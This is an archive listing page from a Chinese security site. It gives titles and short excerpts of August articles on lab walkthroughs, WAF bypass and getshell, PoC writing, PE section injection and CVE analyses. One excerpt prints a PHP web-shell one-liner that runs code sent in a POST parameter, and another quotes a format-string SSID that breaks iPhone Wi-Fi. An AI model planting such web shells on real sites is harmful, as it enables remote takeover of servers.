8月份所有文章 | CN-SEC 中文网

安全文章

新手入门靶机BEE-BOX教程—第二章A9（十）

△△△点击上方“蓝字”关注我们了解更多精彩0x00 Preface [前言/简介]接着上一篇文章，更新BEE-BOX A8题目，有不理解这些靶机是哪儿的小伙伴或者查看以前的篇幅，传送门：https:/...

08月31日168 views评论

阅读全文

代码审计

关于Dvbbs Version 7.0.0 Sp2渗透测试

我常想在纷扰中寻出一点闲静来，然而委实不容易。目前是这么离奇，心里是这么芜杂。我常想在纷扰中寻出一点闲静来，然而委实不容易。序言此文章比较水，没啥技术性可言，只是针对随便水水，cms也是非常复古了，T...

08月31日59 views评论

阅读全文

逆向工程

二进制破解科普系列之TraceMe

零、前言来自whitecell-club的Wens0n同学将在接下来的日子里给大家带来二进制破解科普系列教程。本教程面向新手爱好者，欢迎大家探讨、建议，大牛轻喷。壹、准备工作学习这个系列，...

08月31日158 views评论

阅读全文

安全文章

实战之另辟蹊径绕过waf并getshell拿下站群

前言渗透的一个站上传没有绕过,首先通过弱口令进了后台,经过一番寻找发现了如下配置看到这个,已经胸有成竹,接下来就是常规的加上php后缀,并且上传一波,于是我来了一发如下:waiting了很久有waf检...

08月31日60 views评论

阅读全文

安全文章

记一次PoC编写过程

接触网络安全，vul，poc，exp这些术语肯定不陌生，之前一直没有自己写过poc，今天找了一个简单vul，实践了一次poc的编写。我选择的漏洞是：CVE-2018-15473，漏洞非常简单，描述如下...

08月31日118 views评论

阅读全文

安全新闻

iPhone热点功能的一个bug可以让你“永远”连不上Wi-Fi

作者：yannichen，转载于freebuf6月21日消息，逆向工程师Carl Schou在iPhone中发现了一个新bug。如果手机连接到一个名字中带有特殊字符的热点（如“%p%s%s%s%n”）...

08月31日52 views评论

阅读全文

逆向工程

网络安全编程：PE编程实例之添加节区

添加节区在很多场合都会用到，比如在加壳中、在免杀中都会经常用到对PE文件添加一个节区。添加一个节区的方法有4步，第1步是在节表的最后面添加一个IMAGE_SECTI ON_HEADER，第2步是更新I...

08月31日70 views评论

阅读全文

安全文章

CVE-2021-30481：通过游戏邀请执行源引擎远程代码

Steam是世界上最受欢迎的PC游戏启动器。它使数以百万计的人有机会使用内置的朋友和聚会系统与朋友一起玩自己喜欢的视频游戏，因此可以安全地假设大多数用户在某个时间点或另一个时间点接受了邀请。那里没有真...

08月31日189 views评论

阅读全文

安全文章

Winafl中基于插桩的覆盖率反馈原理

最近winafl增加支持对Intel PT的支持的，但是只支持x64，且覆盖率计算不全，比如条件跳转等，所以它现在还是不如直接用插桩去hook的方式来得准确完整，这里主要想分析也是基于 DynamoR...

08月31日151 views评论

阅读全文

安全文章

我是如何挖到edusrc年度第一的手把手教挖洞系列（一）

本文作者王老师, 本月发表 1 篇文章“2018年11月份的时候偶然得知 EDUSRC 这个平台，当时被礼品中心里面的上海交大的证书吸引就决定要挖一下，后面成功获得了上海交大的漏洞报送证书，且一发不...

08月31日849 views评论

阅读全文

安全文章

python富文本XSS过滤器

python做web开发当今已经逐渐成为主流之一，但相关的一些第三方模块和库还没有php和node.js多。比如XSS过滤组件，PHP下有著名的“HTML Purifier”（http://htmlp...

08月31日104 views评论

阅读全文

渗透中的奇技淫巧---- 最短的各类一句话

菜刀readme.txt中附带一3个一句话：PHP: <?php @eval($_POST['chopper']);?> ASP: <%eval request(&q...

08月31日安全文章203 views评论

阅读全文

新手入门靶机BEE-BOX教程—第二章A9（十）

关于Dvbbs Version 7.0.0 Sp2渗透测试

二进制破解科普系列之TraceMe

实战之另辟蹊径绕过waf并getshell拿下站群

记一次PoC编写过程

iPhone热点功能的一个bug可以让你“永远”连不上Wi-Fi

网络安全编程：PE编程实例之添加节区

CVE-2021-30481：通过游戏邀请执行源引擎远程代码

Winafl中基于插桩的覆盖率反馈原理

我是如何挖到edusrc年度第一的手把手教挖洞系列（一）

python富文本XSS过滤器

渗透中的奇技淫巧---- 最短的各类一句话

在线咨询

微信